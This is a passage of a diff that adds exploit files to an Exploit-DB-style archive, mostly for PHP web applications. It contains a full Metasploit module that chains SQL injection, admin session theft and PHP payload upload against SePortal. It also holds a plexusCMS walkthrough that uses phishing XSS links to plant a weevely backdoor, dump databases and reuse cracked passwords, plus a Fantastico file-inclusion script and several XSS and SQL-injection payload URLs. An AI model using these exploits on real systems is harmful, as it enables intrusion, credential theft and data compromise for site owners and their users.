An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
The issue affects versions prior to Rational ClearCase 7.0.0.4 and 7.0.1.3.
http://www.example.com/ccrc/??''??script?alert(1234)?/script?=123

75
platforms/php/remote/32618.txt Executable file
View file

@ -0,0 +1,75 @@
# Exploit Title: plexusCMS 0.5 XSS Remote Shell Exploit
# Google Dork: allinurl: plx-storage
# Date: 22.02.2013
# Exploit Author: neglomaniac
# Vendor Homepage: http://plexus-cms.org/
# Version: 0.5
---
FILES
backdoor.php simple commend execute backdoor
commands.txt list of useful commands for owning remote box
generator.py create important files with given parameters
phpinfo.php simple phpinfo call for testing
plexus05.tgz original plexus source code for auditing
postit.py send evil POST Request for file upload
readme.txt nothing else than this file
request.txt evil POST request template for postit.py
weevely.php weevely shell with password:secret
weevely.tgz weevely stealth web backdoor client and generator
---
EXPLOITATION
Get database credentials with wget http://RHOST/plx-file/config.php
Try to log in with phpmyadmin and dump the database for password
cracking. If you can crack the password you can upload php files
with new image and new file. You can launch your php backdoors
inside http://plexushost/plx-storage/files/ or plx-storage/images/
If you do not have access to the database in some way you can
upload files with XSS and Social Engineering.
Set up a server with php support and python installed on it. Copy
all this files to a location where you can write to it. Launch
python generator.py plexushost 80 http://yourserver/scripts/ weevely.php
If you see: plximage.php, plximage.js, plximage.xss generated!!!
all files are generated for exploitation.
plexushost is the victim webserver where plexus is installed
port is the standard webserver port
http://yourserver/scripts/ is the location of exploit files. Do not forget
the slash at the end!!!
weevely.php ist the file uploaded at http://victimhost/plx-storage/files/
Get url from plximage.xss obfuscate, iframe and/or shorten it. Put it into
an email, on a webpage or wherever you want.
Socialengineer your victim to open this url. If your victim is logged in
you get your backdoor at: http://victimhost/plx-storage/files/ Else you
need to socialengineer your victim to log in. After the victim logs in you
get your backdoor at files directory.
Connect to your backdoor with weevely and password your password (secret)
python weevely.py http://victimhost/plx-storage/files/yourfile.php secret
Dumpt the whole database with previous collected credential and download ist
mysqldump -f -r plxinfo.txt -uYOURUSER -pYOURPASS --all-databases
wget http://RHOST/plx-storage/files/plxinfo.txt
Crack password and use it for your next hacking attempts against your victim.
For example try this password for root or other users, other mysql databases,
mysql root, facebook/twitter accounts and so on.
---
Exploit: http://www.exploit-db.com/sploits/32618.tgz

174
platforms/php/remote/32621.rb Executable file
View file

@ -0,0 +1,174 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "SePortal SQLi Remote Code Execution",
'Description' => %q{
This module exploits a vulnerability found in SePortal version 2.5.
When logging in as any non-admin user, it's possible to retrieve the admin session
from the database through SQL injection. The SQL injection vulnerability exists
in the "staticpages.php" page. This hash can be used to take over the admin
user session. After logging in, the "/admin/downloads.php" page will be used
to upload arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'jsass', # Discovery
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'References' =>
[
['CVE', '2008-5191'],
['OSVDB', '46567'],
['EDB', '32359']
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['SePortal', {}]
],
'Privileged' => false,
'DisclosureDate' => "Mar 20 2014",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the SePortal installation', '/seportal']),
OptString.new('USER', [true, 'The non-admin user', 'test']),
OptString.new('PASS', [true, 'The non-admin password', 'test'])
], self.class)
end
def uri
return target_uri.path
end
def check
# Check version
vprint_status("#{peer} - Trying to detect installed version")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "index.php")
})
if res and res.code == 200 and res.body =~ /Powered by \<b\>SePortal\<\/b\> (.*)/
version = $1
else
return Exploit::CheckCode::Unknown
end
vprint_status("#{peer} - Version #{version} detected")
if version.to_f <= 2.5
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def exploit
print_status("#{peer} - Logging in as user [ #{datastore['USER']} ]")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, "login.php"),
'vars_post' => {
"user_name" => datastore['USER'],
"user_password" => datastore['PASS']
}
})
if res && res.code == 302 and res.get_cookies =~ /sessionid=([a-zA-Z0-9]+)/
session = $1
print_status("#{peer} - Login successful")
print_status("#{peer} - Session cookie is [ #{session} ]")
else
fail_with(Failure::Unknown, "#{peer} - Login was not succesful!")
end
# Generate random string and convert to hex
sqlq = rand_text_alpha(8)
sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join
# Our SQL Error-Based Injection string - The string will return the admin session between the words ABCD<hash>ABCD in the response page.
sqli = "1' AND (SELECT #{sqls} FROM(SELECT COUNT(*),CONCAT(0x#{sqls},(SELECT MID((IFNULL(CAST(session_id AS CHAR),0x20)),1,50) "
sqli << "FROM seportal_sessions WHERE session_user_id=1 LIMIT 1"
sqli << "),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '0x#{sqls}'='0x#{sqls}"
print_status("#{peer} - Retrieving admin session through SQLi")
res = send_request_cgi({
'method' => 'POST',
'vars_get' => { "sp_id" => sqli },
'cookie' => "sessionid=#{session}",
'uri' => normalize_uri(uri, "staticpages.php")
})
if res and res.code == 200 and res.body =~ /#{sqlq}([a-zA-Z0-9]+)#{sqlq}/
adminhash = $1
print_status("#{peer} - Admin session is [ #{adminhash} ]")
else
fail_with(Failure::Unknown, "#{peer} - Retrieving admin session failed!")
end
# Random filename
payload_name = rand_text_alpha_lower(rand(10) + 5) + '.php'
# Random title
rand_title = rand_text_alpha_lower(rand(10) + 5)
# Random category ID
rand_catid = rand_text_numeric(4)
post_data = Rex::MIME::Message.new
post_data.add_part("savefile", nil, nil, "form-data; name=\"action\"")
post_data.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"file\"; filename=\"#{payload_name}\"")
post_data.add_part(rand_title, nil, nil, "form-data; name=\"file_title\"")
post_data.add_part(rand_catid, nil, nil, "form-data; name=\"cat_id\"")
file = post_data.to_s
file.strip!
print_status("#{peer} - Uploading payload [ #{payload_name} ]")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, "admin", "downloads.php"),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => "sessionid=#{adminhash}",
'data' => file
})
# If the server returns 200 and the body contains our payload name,
# we assume we uploaded the malicious file successfully
if not res or res.code != 200
fail_with(Failure::Unknown, "#{peer} - File wasn't uploaded, aborting!")
end
register_file_for_cleanup(payload_name)
print_status("#{peer} - Requesting payload [ #{uri}/data/down_media/#{payload_name} ]")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "data", "down_media", "#{payload_name}")
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either.
if res and res.code != 200
print_error("#{peer} - Unexpected response, exploit probably failed!")
end
end
end

61
platforms/php/webapps/32622.txt Executable file
View file

@ -0,0 +1,61 @@
Details
================
Software: Ajax Pagination (twitter Style)
Version: 1.1
Homepage: http://wordpress.org/plugins/ajax-pagination/
CVSS: 9.3 (High; AV:N/AC:M/Au:N/C:C/I:C/A:C)
Description
================
End-user exploitable local file inclusion vulnerability in Ajax
Pagination (twitter Style) 1.1
Vulnerability
================
This plugin contains a file inclusion vulnerability that is exploitable
by an unauthenticated user. The user can include any local file ending
in “.php” which is accessible to the web user.
Proof of concept
================
A non-logged in user can call the ajax function
wp_ajax_nopriv_ajax_navigation that calls ajax_navigation_callback in
ajax-pagination-front.php at line 75.
By setting the value of “loop” in the POST data, they can include the
contents of that path on the returned page.
For example, to include the contents of wp-login.php in the returned
page, send the following:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 53
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
paged=2&action=ajax_navigation&loop=../../../wp-login
Mitigations
================
Disable the plugin until a fix is available.
Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our
disclosure policy: https://security.dxw.com/disclosure/
Please contact us on security@dxw.com to acknowledge this report if you
received it via a third party (for example, plugins@wordpress.org) as
they generally cannot communicate with us on your behalf.
Please note that this vulnerability will be published if we do not
receive a response to this report with 14 days.
Timeline
================
2014-02-18: Reported to nuwan28@gmail.com and plugins@wordpress.org
2014-03-28: No response received to reports. Vulnerability published.
Discovered by dxw:
================
Glyn Wintle
Please visit security.dxw.com for more information.

7
platforms/php/webapps/32624.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/32570/info
PHP JOBWEBSITE PRO is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[Path]/siteadmin/forgot.php?adname=SQL'"&fu=Submit

9
platforms/php/webapps/32625.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32570/info
PHP JOBWEBSITE PRO is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[Path]/siteadmin/forgot.php
UserName:<script>alert(1369)</script>

7
platforms/php/webapps/32627.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/32571/info
ASP Forum Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[Path]/new_message.asp?topic_id=0&amp;message_id=0&amp;forum_id=&lt;meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'&gt;

69
platforms/php/webapps/32632.php Executable file
View file

@ -0,0 +1,69 @@
source: http://www.securityfocus.com/bid/32578/info
Fantastico is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
set_time_limit(0);
if(isset($_POST['sup3r'])) {
if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) {
$phpwrapper = '<?php
include_once("./language/".$_GET[sup3r].".php");
?>
';
fwrite($h,$prctl);
fclose($h);
$handle = fopen($_POST['php'], "w");
fwrite($handle, $phpwrapper);
fclose($handle);
echo "Building exploit...<br />";
echo "coding by Super-Crystal <br />";
echo "Cleaning up<br />";
echo "Done!<br />
</pre>";
} else {
echo "error : ".php_uname();
}
} else {
?>
<div align="center">
<h3>Deadly Script</h3>
<font color=red>Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</font><br />
<pre><div align="center">
</pre></div><br />
<table border="0" cellspacing="0">
<tr>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<table border="0" cellspacing="0">
<tr>
<td><div align="right">Exploit:</div></td>
<td>
<select name="exploit">
<option selected="selected">Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</option>
</select>
</td>
</tr>
<tr>
<td><div align="right">change</div></td>
<td><input type="text" name="php" size="50" value="<?php echo getcwd()."/language.php" ?>" /></td>
</tr>
<tr>
</table>
</div>
<input type="hidden" name="sup3r" value="doit" />
<input name="submit" type="submit" value="Submit" /><br />
1- change /home/[user]/.fantasticodata/language.php
<br />
2- click on the submit
<br />
3- now put it like this (e.g)
: http://www.xxxx.com:2082/frontend/x3/fantastico/index.php?sup3r=../../../../../../etc/passwd%00 .
<br />
<font color=red>Written: 10.10.2008</font><br />
<font color=blue>Public: 26.11.2008</font><br />
<div align="center">
<font color=red>Author : Super-Crystal</font><br />
<a href="http://www.arab4services.net">Arab4services.net </a></center>
</div>
</form>
<?php } ?>

9
platforms/php/webapps/32633.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32598/info
Z1Exchange is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Z1Exchange 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/[Path]/showads.php?id=[SQL]

9
platforms/php/webapps/32634.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/32598/info
Z1Exchange is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Z1Exchange 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/[Path]/showads.php?id=<script>alert(1369)</script>

7
platforms/php/webapps/32636.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/32600/info
Orkut Clone is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/orkutclone/profile_social.php?id=[sql query]

7
platforms/php/webapps/32637.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/32600/info
Orkut Clone is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/profile_social.php?id=%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(0000)%3B%3C/ScRiPt%3E